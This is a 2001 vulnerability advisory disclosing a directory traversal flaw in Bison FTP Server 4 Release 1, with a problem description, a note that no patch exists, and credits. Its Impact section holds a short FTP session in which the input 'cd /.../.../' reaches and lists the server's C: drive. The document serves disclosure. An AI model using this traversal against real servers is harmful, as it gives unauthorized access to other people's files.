Hexyn-sa-17.txt

`Hexyn / Securax Advisory #17 - Bison FTP Server Directory Traversal  
  
Topic: Bison FTP Server Directory Traversal  
Announced: 2001-02-17  
Affects: Bison FTP Server version 4 Release 1  
  
DISCLAIMER:  
***********  
THE ENTIRE ADVISORY HAS BEEN BASED UPON TRIAL AND ERROR RESULTS.  
THEREFORE WE CANNOT ENSURE YOU THE INFORMATION BELOW IS 100% CORRECT.  
THIS DOCUMENT IS SUBJECT TO CHANGE WITHOUT PRIOR NOTICE.  
  
THIS ADVISORY HAS ONLY BEEN TESTED ON WINDOWS 98 AND ONLY ON A SMALL   
COLLECTION OF TEST SERVERS, SO THE OFFERED INFORMATION MAY NOT ALWAYS   
BE CORRECT.  
  
I. Problem Description  
**********************  
Bison FTP Server is an FTP server for Windows 9x/NT. A bug allows any  
user to change to any directory.  
  
II. Impact  
**************  
When sending the command "CWD ..." (or "cd ..." in the default UNIX FTP  
client), the server will go one directory up.  
  
Example:  
--------  
  
<snip>  
230 User anonymous logged in.  
Remote system type is UNIX.  
Using binary mode to transfer files.  
ftp> cd /.../.../  
250 CWD command successful.  
ftp> ls  
200 PORT command successful.  
150 Opening ASCII mode data connection for /.  
<directory listing of c:\>  
ftp> quit  
221 Bye.   
  
III. Solution  
*************  
At this time, no patch is available yet.  
  
IV. Credits  
***********  
Bug discovered by t-Omicr0n <[email protected]>  
  
Greets to: f0bic, The Incubus, R00T-dude, cicer0, vorlon, sentinel,   
oPr, Reggie, F_F, Shaolin_p, Segfau|t, NecrOmaN, Zym0t1c, l0r3,   
Preat0r, T0SH, zeroX, AreS, tips, Lacrima, GigaByte and everyone   
at #[email protected]  
  
-- t-Omicr0n @ http://t-Omicr0n.hexyn.be  
  
`